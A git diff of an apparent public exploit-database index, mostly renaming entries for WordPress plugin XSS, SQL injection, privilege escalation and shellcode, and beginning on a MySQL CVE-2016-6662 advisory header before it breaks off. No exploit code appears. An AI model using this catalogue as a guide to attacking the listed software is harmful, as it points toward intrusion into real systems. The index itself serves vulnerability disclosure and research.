37098,platforms/windows/local/37098.txt,"Microsoft Windows - Privilege Escalation (MS15-010)",2015-05-25,"Sky lake",windows,local,0 -37253,platforms/php/webapps/37253.txt,"Paypal Currency Converter Basic For WooCommerce - File Read",2015-06-10,Kuroi'SH,php,webapps,0 +37253,platforms/php/webapps/37253.txt,"Wordpress Plugin Paypal Currency Converter Basic For WooCommerce - File Read",2015-06-10,Kuroi'SH,php,webapps,0 37254,platforms/php/webapps/37254.txt,"WordPress Plugin History Collection 1.1.1 - Arbitrary File Download",2015-06-10,Kuroi'SH,php,webapps,80 37255,platforms/php/webapps/37255.txt,"Pandora FMS 5.0/5.1 - Authentication Bypass",2015-06-10,"Manuel Mancera",php,webapps,0 37100,platforms/php/webapps/37100.txt,"Waylu CMS - 'products_xx.php' SQL Injection / HTML Injection",2012-04-20,TheCyberNuxbie,php,webapps,0 @@ -33572,7 +33582,7 @@ id,file,description,date,author,platform,type,port 37110,platforms/java/webapps/37110.py,"Apache JackRabbit - WebDAV XXE Exploit",2015-05-26,"Mikhail Egorov",java,webapps,8080 37111,platforms/php/webapps/37111.txt,"WordPress Plugin MailChimp Subscribe Forms 1.1 - Remote Code Execution",2015-05-26,woodspeed,php,webapps,80 37112,platforms/php/webapps/37112.txt,"WordPress Plugin church_admin 0.800 - Persistent Cross-Site Scripting",2015-05-26,woodspeed,php,webapps,80 -37113,platforms/php/webapps/37113.txt,"Wordpess Simple Photo Gallery 1.7.8 - Blind SQL Injection",2015-05-26,woodspeed,php,webapps,80 +37113,platforms/php/webapps/37113.txt,"Wordpress Plugin Simple Photo Gallery 1.7.8 - Blind SQL Injection",2015-05-26,woodspeed,php,webapps,80 37114,platforms/jsp/webapps/37114.txt,"Sendio ESP - Information Disclosure",2015-05-26,"Core Security",jsp,webapps,80 37115,platforms/perl/webapps/37115.txt,"ClickHeat 1.13+ - Remote Command Execution",2015-05-26,"Calum Hutton",perl,webapps,0 37116,platforms/php/webapps/37116.py,"Silverstripe CMS 2.4.7 - install.php PHP Code Injection",2012-04-27,"Mehmet Ince",php,webapps,0 @@ -33628,13 +33638,13 @@ id,file,description,date,author,platform,type,port 37168,platforms/linux/local/37168.txt,"PonyOS 3.0 - ELF Loader Privilege Escalation",2015-06-01,"Hacker Fantastic",linux,local,0 37171,platforms/hardware/remote/37171.rb,"D-Link Devices - HNAP SOAPAction-Header Command Execution (Metasploit)",2015-06-01,Metasploit,hardware,remote,0 37172,platforms/hardware/webapps/37172.txt,"Aruba ClearPass Policy Manager - Persistent Cross-Site Scripting",2015-06-01,"Cristiano Maruti",hardware,webapps,0 -37173,platforms/php/webapps/37173.txt,"Download Monitor 3.3.5.4 - 'uploader.php' Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 +37173,platforms/php/webapps/37173.txt,"Wordpress Plugin Download Monitor 3.3.5.4 - 'uploader.php' Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 37174,platforms/php/webapps/37174.txt,"WordPress Plugin Network Publisher 5.0.1 - 'networkpub_key' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 -37175,platforms/php/webapps/37175.txt,"Download Manager 2.2.2 - 'cid' Parameter Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 -37176,platforms/php/webapps/37176.txt,"PDF & Print Button Joliprint 1.3.0 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 +37175,platforms/php/webapps/37175.txt,"Wordpress Plugin Download Manager 2.2.2 - 'cid' Parameter Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 +37176,platforms/php/webapps/37176.txt,"Wordpress Plugin PDF & Print Button Joliprint 1.3.0 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 37177,platforms/php/webapps/37177.txt,"WordPress Plugin CataBlog 1.6 - 'admin.php' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 -37178,platforms/php/webapps/37178.txt,"2 Click Social Media Buttons 0.32.2 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 -37179,platforms/php/webapps/37179.txt,"iFrame Admin Pages 0.1 - 'main_page.php' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 +37178,platforms/php/webapps/37178.txt,"Wordpress Plugin 2 Click Social Media Buttons 0.32.2 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 +37179,platforms/php/webapps/37179.txt,"Wordpress Plugin iFrame Admin Pages 0.1 - 'main_page.php' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 37180,platforms/php/webapps/37180.txt,"WordPress Plugin NewsLetter Manager 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 37184,platforms/hardware/remote/37184.py,"Seagate Central 2014.0410.0026-F - Remote Root Exploit",2015-06-03,"Jeremy Brown",hardware,remote,0 37185,platforms/hardware/webapps/37185.py,"Seagate Central 2014.0410.0026-F - Remote Facebook Access Token Exploit",2015-06-03,"Jeremy Brown",hardware,webapps,0 @@ -33642,19 +33652,19 @@ id,file,description,date,author,platform,type,port 37183,platforms/linux/local/37183.c,"PonyOS 3.0 - tty ioctl() Local Kernel Exploit",2015-06-02,"Hacker Fantastic",linux,local,0 37187,platforms/windows/dos/37187.py,"Jildi FTP Client - Buffer Overflow (PoC)",2015-06-03,metacom,windows,dos,21 37188,platforms/windows/dos/37188.txt,"WebDrive 12.2 (B4172) - Buffer Overflow",2015-06-03,Vulnerability-Lab,windows,dos,0 -37189,platforms/php/webapps/37189.txt,"Media Library Categories - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 -37190,platforms/php/webapps/37190.txt,"LeagueManager 3.7 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 +37189,platforms/php/webapps/37189.txt,"Wordpress Plugin Media Library Categories - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 +37190,platforms/php/webapps/37190.txt,"Wordpress Plugin LeagueManager 3.7 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 37191,platforms/php/webapps/37191.txt,"WordPress Plugin Leaflet Maps Marker 0.0.1 - leaflet_layer.php id Parameter Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 37192,platforms/php/webapps/37192.txt,"WordPress Plugin Leaflet Maps Marker 0.0.1 for - leaflet_marker.php id Parameter Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 -37193,platforms/php/webapps/37193.txt,"GD Star Rating 1.9.16 - 'tpl_section' Parameter Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 -37194,platforms/php/webapps/37194.txt,"Mingle Forum 1.0.33 - 'admin.php' Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 +37193,platforms/php/webapps/37193.txt,"Wordpress Plugin GD Star Rating 1.9.16 - 'tpl_section' Parameter Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 +37194,platforms/php/webapps/37194.txt,"Wordpress Plugin ]Mingle Forum 1.0.33 - 'admin.php' Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 37195,platforms/php/webapps/37195.txt,"WordPress Plugin WP Forum Server 1.7.3 - fs-admin/fs-admin.php Multiple Parameter Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 37196,platforms/php/webapps/37196.txt,"WordPress Plugin Pretty Link Lite 1.5.2 - SQL Injection / Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 37198,platforms/multiple/remote/37198.rb,"JDownloader 2 Beta - Directory Traversal",2015-06-04,PizzaHatHacker,multiple,remote,0 37199,platforms/hardware/dos/37199.txt,"ZTE AC 3633R USB Modem - Multiple Vulnerabilities",2015-06-04,Vishnu,hardware,dos,0 37200,platforms/php/webapps/37200.txt,"WordPress Plugin zM Ajax Login & Register 1.0.9 - Local File Inclusion",2015-06-04,"Panagiotis Vagenas",php,webapps,80 37201,platforms/php/webapps/37201.txt,"WordPress Plugin Sharebar 1.2.1 - SQL Injection / Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 -37202,platforms/php/webapps/37202.txt,"Share and Follow 1.80.3 - 'admin.php' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 +37202,platforms/php/webapps/37202.txt,"Wordpress Plugin Share and Follow 1.80.3 - 'admin.php' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 37203,platforms/php/webapps/37203.txt,"WordPress Plugin Soundcloud Is Gold 2.1 - 'width' Parameter Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 37204,platforms/php/webapps/37204.txt,"WordPress Plugin Track That Stat 1.0.8 - Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 37205,platforms/php/webapps/37205.txt,"LongTail JW Player - 'debug' Parameter Cross-Site Scripting",2012-05-16,gainover,php,webapps,0 @@ -34013,7 +34023,7 @@ id,file,description,date,author,platform,type,port 37597,platforms/hardware/remote/37597.rb,"Accellion FTA - getStatus verify_oauth_token Command Execution (Metasploit)",2015-07-13,Metasploit,hardware,remote,443 37598,platforms/multiple/remote/37598.rb,"VNC Keyboard - Remote Code Execution (Metasploit)",2015-07-13,Metasploit,multiple,remote,5900 37599,platforms/windows/remote/37599.rb,"Adobe Flash - opaqueBackground Use-After-Free (Metasploit)",2015-07-13,Metasploit,windows,remote,0 -37600,platforms/multiple/remote/37600.rb,"Western Digital Arkeia - Remote Code Execution (Metasploit)",2015-07-13,Metasploit,multiple,remote,617 +37600,platforms/multiple/remote/37600.rb,"Western Digital Arkeia - Remote Code Execution (Metasploit) (2)",2015-07-13,Metasploit,multiple,remote,617 37601,platforms/php/webapps/37601.txt,"WordPress Plugin Swim Team 1.44.10777 - Arbitrary File Download",2015-07-13,"Larry W. Cashdollar",php,webapps,80 37602,platforms/php/webapps/37602.txt,"ZenPhoto 1.4.8 - Multiple Vulnerabilities",2015-07-13,"Tim Coen",php,webapps,80 37603,platforms/php/webapps/37603.txt,"WordPress Plugin CP Contact Form with Paypal 1.1.5 - Multiple Vulnerabilities",2015-07-13,"Nitin Venkatesh",php,webapps,80 @@ -34541,7 +34551,7 @@ id,file,description,date,author,platform,type,port 38164,platforms/hardware/remote/38164.py,"Belkin Wireless Router Default - WPS PIN Security",2013-01-03,ZhaoChunsheng,hardware,remote,0 38165,platforms/windows/dos/38165.txt,"IKEView.exe Fox Beta 1 - Stack Buffer Overflow",2015-09-13,hyp3rlinx,windows,dos,0 38166,platforms/php/webapps/38166.txt,"WHMCS 5.0 - Insecure Cookie Authentication Bypass",2012-12-31,Agd_Scorp,php,webapps,0 -38167,platforms/php/webapps/38167.php,"Multiple WordPress Themes WPScientist - Arbitrary File Upload",2013-01-04,JingoBD,php,webapps,0 +38167,platforms/php/webapps/38167.php,"Multiple WordPress WPScientist Themes - Arbitrary File Upload",2013-01-04,JingoBD,php,webapps,0 38168,platforms/php/webapps/38168.txt,"TomatoCart - 'json.php' Security Bypass",2013-01-04,"Aung Khant",php,webapps,0 38169,platforms/php/webapps/38169.txt,"Havalite CMS - 'comment' Parameter HTML Injection",2013-01-06,"Henri Salo",php,webapps,0 38170,platforms/android/remote/38170.txt,"Facebook for Android - 'LoginActivity' Information Disclosure",2013-01-07,"Takeshi Terada",android,remote,0 @@ -34551,7 +34561,7 @@ id,file,description,date,author,platform,type,port 38174,platforms/multiple/webapps/38174.txt,"ManageEngine OpManager 11.5 - Multiple Vulnerabilities",2015-09-14,xistence,multiple,webapps,0 38179,platforms/multiple/remote/38179.txt,"Dell OpenManage Server Administrator - Cross-Site Scripting",2013-01-09,"Tenable NS",multiple,remote,0 38180,platforms/php/webapps/38180.txt,"tinybrowser - /tiny_mce/plugins/tinybrowser/edit.php type Parameter Cross-Site Scripting",2013-01-09,MustLive,php,webapps,0 -38176,platforms/php/webapps/38176.txt,"EZ SQL Reports < 4.11.37 - Multiple Vulnerabilities",2015-09-14,"Felipe Molina",php,webapps,0 +38176,platforms/php/webapps/38176.txt,"Wordpress Plugin EZ SQL Reports < 4.11.37 - Multiple Vulnerabilities",2015-09-14,"Felipe Molina",php,webapps,0 38177,platforms/windows/dos/38177.txt,"IKEView.exe R60 - Stack Buffer Overflow",2015-09-14,hyp3rlinx,windows,dos,0 38181,platforms/php/webapps/38181.txt,"tinybrowser - /tiny_mce/plugins/tinybrowser/upload.php type Parameter Cross-Site Scripting",2013-01-09,MustLive,php,webapps,0 38182,platforms/php/webapps/38182.txt,"tinybrowser - /tiny_mce/plugins/tinybrowser/tinybrowser.php type Parameter Cross-Site Scripting",2013-01-09,MustLive,php,webapps,0 @@ -34746,7 +34756,7 @@ id,file,description,date,author,platform,type,port 38381,platforms/windows/local/38381.py,"WinRar < 5.30 Beta 4 - Settings Import Command Execution",2015-10-02,R-73eN,windows,local,0 38382,platforms/windows/local/38382.py,"ASX to MP3 Converter 1.82.50 - '.asx' Stack Overflow",2015-10-02,ex_ptr,windows,local,0 38383,platforms/linux/webapps/38383.py,"ElasticSearch 1.6.0 - Arbitrary File Download",2015-10-02,"Pedro Andujar",linux,webapps,9200 -38384,platforms/windows/remote/38384.txt,"Avast AntiVirus - X.509 Error Rendering Command Execution",2015-10-02,"Google Security Research",windows,remote,0 +38384,platforms/windows/remote/38384.txt,"Avast! AntiVirus - X.509 Error Rendering Command Execution",2015-10-02,"Google Security Research",windows,remote,0 38385,platforms/php/webapps/38385.txt,"KindEditor - Multiple Arbitrary File Upload Vulnerabilities",2013-03-11,KedAns-Dz,php,webapps,0 38386,platforms/php/webapps/38386.txt,"PHPBoost - Arbitrary File Upload / Information Disclosure",2013-03-11,KedAns-Dz,php,webapps,0 38387,platforms/multiple/remote/38387.txt,"RubyGems fastreader - 'entry_controller.rb' Remote Command Execution",2013-03-12,"Larry W. Cashdollar",multiple,remote,0 @@ -34957,7 +34967,7 @@ id,file,description,date,author,platform,type,port 38605,platforms/php/webapps/38605.txt,"Nameko - 'nameko.php' Cross-Site Scripting",2013-06-29,"Andrea Menin",php,webapps,0 38606,platforms/php/webapps/38606.txt,"WordPress Plugin WP Private Messages - 'msgid' Parameter SQL Injection",2013-06-29,"IeDb ir",php,webapps,0 38607,platforms/php/webapps/38607.txt,"Atomy Maxsite - 'index.php' Arbitrary File Upload",2013-06-30,Iranian_Dark_Coders_Team,php,webapps,0 -38608,platforms/php/webapps/38608.txt,"Xorbin Analog Flash Clock - 'widgetUrl' Parameter Cross-Site Scripting",2013-06-30,"Prakhar Prasad",php,webapps,0 +38608,platforms/php/webapps/38608.txt,"Wordpress Plugin Xorbin Analog Flash Clock - 'widgetUrl' Parameter Cross-Site Scripting",2013-06-30,"Prakhar Prasad",php,webapps,0 38609,platforms/windows/local/38609.py,"Gold MP4 Player - '.swf' Local Exploit",2015-11-03,"Vivek Mahajan",windows,local,0 38610,platforms/android/dos/38610.txt,"Samsung Galaxy S6 Samsung Gallery - GIF Parsing Crash",2015-11-03,"Google Security Research",android,dos,0 38611,platforms/android/dos/38611.txt,"Samsung Galaxy S6 - android.media.process Face Recognition Memory Corruption",2015-11-03,"Google Security Research",android,dos,0 @@ -34988,7 +34998,7 @@ id,file,description,date,author,platform,type,port 38636,platforms/multiple/remote/38636.txt,"Cryptocat 2.0.21 Chrome Extension - 'img/keygen.gif' File Information Disclosure",2012-11-07,"Mario Heiderich",multiple,remote,0 38637,platforms/multiple/remote/38637.txt,"Cryptocat 2.0.22 - Arbitrary Script Injection",2012-11-07,"Mario Heiderich",multiple,remote,0 38638,platforms/php/webapps/38638.txt,"Mintboard - Multiple Cross-Site Scripting Vulnerabilities",2013-07-10,"Canberk BOLAT",php,webapps,0 -38639,platforms/php/webapps/38639.txt,"miniBB - SQL Injection / Multiple Cross-Site Scripting Vulnerabilities",2013-07-11,Netsparker,php,webapps,0 +38639,platforms/php/webapps/38639.txt,"Wordpress Plugin miniBB - SQL Injection / Multiple Cross-Site Scripting Vulnerabilities",2013-07-11,Netsparker,php,webapps,0 38640,platforms/multiple/webapps/38640.rb,"OpenSSL - Alternative Chains Certificate Forgery",2015-11-05,"Ramon de C Valle",multiple,webapps,0 38641,platforms/multiple/webapps/38641.rb,"JSSE - SKIP-TLS Exploit",2015-11-05,"Ramon de C Valle",multiple,webapps,0 38643,platforms/php/webapps/38643.txt,"WordPress Plugin Pie Register - 'wp-login.php' Multiple Cross-Site Scripting Vulnerabilities",2013-07-12,gravitylover,php,webapps,0 @@ -35263,10 +35273,10 @@ id,file,description,date,author,platform,type,port 38928,platforms/php/webapps/38928.txt,"Gökhan Balbal Script 2.0 - Cross-Site Request Forgery",2015-12-10,KnocKout,php,webapps,80 38929,platforms/hardware/webapps/38929.txt,"Skybox Platform <= 7.0.611 - Multiple Vulnerabilities",2015-12-10,"SEC Consult",hardware,webapps,8443 38930,platforms/multiple/dos/38930.txt,"Rar - CmdExtract::UnstoreFile Integer Truncation Memory Corruption",2015-12-10,"Google Security Research",multiple,dos,0 -38931,platforms/multiple/dos/38931.txt,"Avast - OOB Write Decrypting PEncrypt Packed executables",2015-12-10,"Google Security Research",multiple,dos,0 -38932,platforms/multiple/dos/38932.txt,"Avast - JetDb::IsExploited4x Performs Unbounded Search on Input",2015-12-10,"Google Security Research",multiple,dos,0 -38933,platforms/multiple/dos/38933.txt,"Avast - Heap Overflow Unpacking MoleBox Archives",2015-12-10,"Google Security Research",multiple,dos,0 -38934,platforms/windows/dos/38934.txt,"Avast - Integer Overflow Verifying numFonts in TTC Header",2015-12-10,"Google Security Research",windows,dos,0 +38931,platforms/multiple/dos/38931.txt,"Avast! - OOB Write Decrypting PEncrypt Packed executables",2015-12-10,"Google Security Research",multiple,dos,0 +38932,platforms/multiple/dos/38932.txt,"Avast! - JetDb::IsExploited4x Performs Unbounded Search on Input",2015-12-10,"Google Security Research",multiple,dos,0 +38933,platforms/multiple/dos/38933.txt,"Avast! - Heap Overflow Unpacking MoleBox Archives",2015-12-10,"Google Security Research",multiple,dos,0 +38934,platforms/windows/dos/38934.txt,"Avast! - Integer Overflow Verifying numFonts in TTC Header",2015-12-10,"Google Security Research",windows,dos,0 38935,platforms/asp/webapps/38935.txt,"CMS Afroditi - 'id' Parameter SQL Injection",2013-12-30,"projectzero labs",asp,webapps,0 38936,platforms/php/webapps/38936.txt,"WordPress Plugin Advanced Dewplayer - 'download-file.php' Script Directory Traversal",2013-12-30,"Henri Salo",php,webapps,0 38937,platforms/linux/local/38937.txt,"Apache Libcloud Digital Ocean API - Local Information Disclosure",2014-01-01,anonymous,linux,local,0 @@ -35448,14 +35458,14 @@ id,file,description,date,author,platform,type,port 39122,platforms/windows/local/39122.py,"KiTTY Portable 0.65.0.2p (Windows 8.1 / Windows 10) - Local kitty.ini Overflow",2015-12-29,"Guillaume Kaddouch",windows,local,0 39124,platforms/php/webapps/39124.txt,"MeiuPic - 'ctl' Parameter Local File Inclusion",2014-03-10,Dr.3v1l,php,webapps,0 39125,platforms/windows/dos/39125.html,"Kaspersky Internet Security - Remote Denial of Service",2014-03-20,CXsecurity,windows,dos,0 -39126,platforms/php/webapps/39126.txt,"BIGACE Web CMS 2.7.5 - '/public/index.php' LANGUAGE Parameter Directory Traversal",2014-03-19,"Hossein Hezami",php,webapps,0 +39126,platforms/php/webapps/39126.txt,"BigACE Web CMS 2.7.5 - '/public/index.php' LANGUAGE Parameter Directory Traversal",2014-03-19,"Hossein Hezami",php,webapps,0 39127,platforms/cgi/webapps/39127.txt,"innoEDIT - 'innoedit.cgi' Remote Command Execution",2014-03-21,"Felipe Andrian Peixoto",cgi,webapps,0 39128,platforms/php/webapps/39128.txt,"Jorjweb - 'id' Parameter SQL Injection",2014-02-21,"Vulnerability Laboratory",php,webapps,0 39129,platforms/php/webapps/39129.txt,"qEngine - 'run' Parameter Local File Inclusion",2014-03-25,"Gjoko Krstic",php,webapps,0 39130,platforms/cgi/webapps/39130.txt,"DotItYourself - 'dot-it-yourself.cgi' Remote Command Execution",2014-03-26,"Felipe Andrian Peixoto",cgi,webapps,0 39131,platforms/cgi/webapps/39131.txt,"Beheer Systeem - 'pbs.cgi' Remote Command Execution",2014-03-26,"Felipe Andrian Peixoto",cgi,webapps,0 39132,platforms/windows/local/39132.py,"FTPShell Client 5.24 - Buffer Overflow",2015-12-30,hyp3rlinx,windows,local,0 -39133,platforms/php/webapps/39133.php,"Simple Ads Manager 2.9.4.116 - SQL Injection",2015-12-30,"Kacper Szurek",php,webapps,80 +39133,platforms/php/webapps/39133.php,"Wordpress Plugin Simple Ads Manager 2.9.4.116 - SQL Injection",2015-12-30,"Kacper Szurek",php,webapps,80 39134,platforms/linux/local/39134.txt,"DeleGate 9.9.13 - Privilege Escalation",2015-12-30,"Larry W. Cashdollar",linux,local,0 39135,platforms/php/webapps/39135.php,"WordPress Theme Felici - 'Uploadify.php' Arbitrary File Upload",2014-03-23,"CaFc Versace",php,webapps,0 39136,platforms/php/webapps/39136.txt,"Symphony 2.2.4 - Cross-Site Request Forgery",2014-03-24,"High-Tech Bridge",php,webapps,0 @@ -35646,7 +35656,7 @@ id,file,description,date,author,platform,type,port 39325,platforms/multiple/dos/39325.txt,"Wireshark - hiqnet_display_data Static Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos,0 39326,platforms/multiple/dos/39326.txt,"Wireshark - nettrace_3gpp_32_423_file_open Stack Based Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos,0 39327,platforms/multiple/dos/39327.txt,"Wireshark - dissect_ber_constrained_bitstring Heap Based Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos,0 -40360,platforms/linux/local/40360.txt,"MySQL / MariaDB / PerconaDB 5.5.52 / 5.6.33 / 5.7.15 - Code Execution / Privilege Escalation",2016-09-12,"Dawid Golunski",linux,local,3306 +40360,platforms/linux/local/40360.txt,"MySQL / MariaDB / PerconaDB 5.5.51 / 5.6.32 / 5.7.14 - Code Execution / Privilege Escalation",2016-09-12,"Dawid Golunski",linux,local,3306 39328,platforms/android/remote/39328.rb,"Android ADB Debug Server - Remote Payload Execution (Metasploit)",2016-01-26,Metasploit,android,remote,5555 39329,platforms/windows/dos/39329.py,"InfraRecorder - '.m3u' File Buffer Overflow",2014-05-25,"Osanda Malith",windows,dos,0 39330,platforms/windows/dos/39330.txt,"Foxit Reader 7.2.8.1124 - PDF Parsing Memory Corruption",2016-01-26,"Francis Provencher",windows,dos,0 @@ -35834,7 +35844,7 @@ id,file,description,date,author,platform,type,port 39525,platforms/win_x86-64/local/39525.py,"Microsoft Windows 7 (x64) - 'afd.sys' Privilege Escalation (MS14-040)",2016-03-07,"Rick Larabee",win_x86-64,local,0 39526,platforms/php/webapps/39526.sh,"Cerberus Helpdesk (Cerb5) 5 < 6.7 - Password Hash Disclosure",2016-03-07,asdizzle_,php,webapps,80 39529,platforms/multiple/dos/39529.txt,"Wireshark - wtap_optionblock_free Use-After-Free",2016-03-07,"Google Security Research",multiple,dos,0 -39530,platforms/windows/dos/39530.txt,"Avast - Authenticode Parsing Memory Corruption",2016-03-07,"Google Security Research",windows,dos,0 +39530,platforms/windows/dos/39530.txt,"Avast! - Authenticode Parsing Memory Corruption",2016-03-07,"Google Security Research",windows,dos,0 39531,platforms/windows/local/39531.c,"McAfee VirusScan Enterprise 8.8 - Security Restrictions Bypass",2016-03-07,"Maurizio Agazzini",windows,local,0 39533,platforms/windows/dos/39533.txt,"Adobe Digital Editions 4.5.0 - '.pdf' Critical Memory Corruption",2016-03-09,"Pier-Luc Maltais",windows,dos,0 39534,platforms/php/webapps/39534.html,"Bluethrust Clan Scripts v4 R17 - Multiple Vulnerabilities",2016-03-09,"Brandon Murphy",php,webapps,80 @@ -36045,7 +36055,7 @@ id,file,description,date,author,platform,type,port 39758,platforms/lin_x86-64/shellcode/39758.c,"Linux/x86-64 - Bind 1472/TCP Shellcode (IPv6) (199 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0 39759,platforms/php/webapps/39759.txt,"Alibaba Clone B2B Script - Admin Authentication Bypass",2016-05-04,"Meisam Monsef",php,webapps,80 39760,platforms/php/webapps/39760.txt,"CMS Made Simple < 2.1.3 / < 1.12.1 - Web Server Cache Poisoning",2016-05-04,"Mickaël Walter",php,webapps,80 -39761,platforms/php/webapps/39761.txt,"Acunetix WP Security Plugin 3.0.3 - Cross-Site Scripting",2016-05-04,"Johto Robbie",php,webapps,80 +39761,platforms/php/webapps/39761.txt,"Wordpress Plugin Acunetix WP Security Plugin 3.0.3 - Cross-Site Scripting",2016-05-04,"Johto Robbie",php,webapps,80 39762,platforms/cgi/webapps/39762.txt,"NetCommWireless HSPA 3G10WVE Wireless Router - Multiple Vulnerabilities",2016-05-04,"Bhadresh Patel",cgi,webapps,80 39763,platforms/lin_x86-64/shellcode/39763.c,"Linux/x86-64 - Reverse TCP Shellcode (IPv6) (203 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0 39764,platforms/linux/local/39764.py,"TRN Threaded USENET News Reader 3.6-23 - Local Stack Based Overflow",2016-05-04,"Juan Sacco",linux,local,0 @@ -36129,7 +36139,7 @@ id,file,description,date,author,platform,type,port 39845,platforms/windows/local/39845.txt,"Operation Technology ETAP 14.1.0 - Privilege Escalation",2016-05-23,LiquidWorm,windows,local,0 39846,platforms/windows/dos/39846.txt,"Operation Technology ETAP 14.1.0 - Multiple Stack Buffer Overrun Vulnerabilities",2016-05-23,LiquidWorm,windows,dos,0 39847,platforms/lin_x86-64/shellcode/39847.c,"Linux/x86-64 - Information Stealer Shellcode (399 bytes)",2016-05-23,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0 -39848,platforms/php/webapps/39848.py,"Job Script by Scubez - Remote Code Execution",2016-05-23,"Bikramaditya Guha",php,webapps,80 +39848,platforms/php/webapps/39848.py,"Wordpress Plugin Job Script by Scubez - Remote Code Execution",2016-05-23,"Bikramaditya Guha",php,webapps,80 39849,platforms/php/webapps/39849.txt,"XenAPI 1.4.1 for XenForo - Multiple SQL Injections",2016-05-23,"Julien Ahrens",php,webapps,443 39850,platforms/asp/webapps/39850.txt,"AfterLogic WebMail Pro ASP.NET 6.2.6 - Administrator Account Disclosure (via XXE Injection)",2016-05-24,"Mehmet Ince",asp,webapps,80 39851,platforms/lin_x86/shellcode/39851.c,"Linux/x86 - Bind Shell Port 4444/TCP Shellcode (656 bytes)",2016-05-25,"Brandon Dennis",lin_x86,shellcode,0 @@ -36253,7 +36263,7 @@ id,file,description,date,author,platform,type,port 40054,platforms/linux/local/40054.c,"Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Privilege Escalation",2016-07-04,halfdog,linux,local,0 39976,platforms/php/webapps/39976.txt,"sNews CMS 1.7.1 - Multiple Vulnerabilities",2016-06-20,hyp3rlinx,php,webapps,80 39977,platforms/php/webapps/39977.txt,"Joomla! Component BT Media (com_bt_media) - SQL Injection",2016-06-20,"Persian Hack Team",php,webapps,80 -39978,platforms/php/webapps/39978.php,"Premium SEO Pack 1.9.1.3 - wp_options Overwrite",2016-06-20,wp0Day.com,php,webapps,80 +39978,platforms/php/webapps/39978.php,"Wordpress Plugin Premium SEO Pack 1.9.1.3 - wp_options Overwrite",2016-06-20,wp0Day.com,php,webapps,80 39979,platforms/windows/shellcode/39979.c,"Windows XP < 10 - Download & Execute Shellcode",2016-06-20,B3mB4m,windows,shellcode,0 39980,platforms/windows/local/39980.rb,"Tomabo MP4 Player 3.11.6 - SEH Based Stack Overflow (Metasploit)",2016-06-20,s0nk3y,windows,local,0 39981,platforms/php/webapps/39981.html,"Airia - Cross-Site Request Forgery (Add Content)",2016-06-20,HaHwul,php,webapps,80 @@ -36512,6 +36522,7 @@ id,file,description,date,author,platform,type,port 40282,platforms/cgi/webapps/40282.txt,"JVC IP-Camera VN-T216VPRU - Local File Disclosure",2016-08-22,"Yakir Wizman",cgi,webapps,0 40283,platforms/cgi/webapps/40283.txt,"Honeywell IP-Camera HICC-1100PT - Local File Disclosure",2016-08-22,"Yakir Wizman",cgi,webapps,0 40284,platforms/hardware/webapps/40284.txt,"VideoIQ Camera - Local File Disclosure",2016-08-22,"Yakir Wizman",hardware,webapps,0 +40285,platforms/php/webapps/40285.txt,"Ocomon 2.0 - SQL Injection",2016-08-22,"Jonatas Fil",php,webapps,80 40286,platforms/java/webapps/40286.txt,"Sakai 10.7 - Multiple Vulnerabilities",2016-08-22,LiquidWorm,java,webapps,0 40288,platforms/php/webapps/40288.txt,"WordPress 4.5.3 - Directory Traversal / Denial of Service",2016-08-22,"Yorick Koster",php,webapps,80 40289,platforms/hardware/dos/40289.txt,"ObiHai ObiPhone 1032/1062 < 5-0-0-3497 - Multiple Vulnerabilities",2016-08-22,"David Tomaschik",hardware,dos,0 diff --git a/platforms/linux/local/40360.txt b/platforms/linux/local/40360.txt index 41c9853f4..e49350d5b 100755 --- a/platforms/linux/local/40360.txt +++ b/platforms/linux/local/40360.txt @@ -1,3 +1,5 @@ + + ============================================= - Discovered by: Dawid Golunski - http://legalhackers.com @@ -5,6 +7,8 @@ - CVE-2016-6662 - Release date: 12.09.2016 +- Last updated: 23.09.2016 +- Revision: 3 - Severity: Critical ============================================= @@ -12,9 +16,9 @@ I. VULNERABILITY ------------------------- -MySQL <= 5.7.15 Remote Root Code Execution / Privilege Escalation (0day) - 5.6.33 - 5.5.52 +MySQL <= 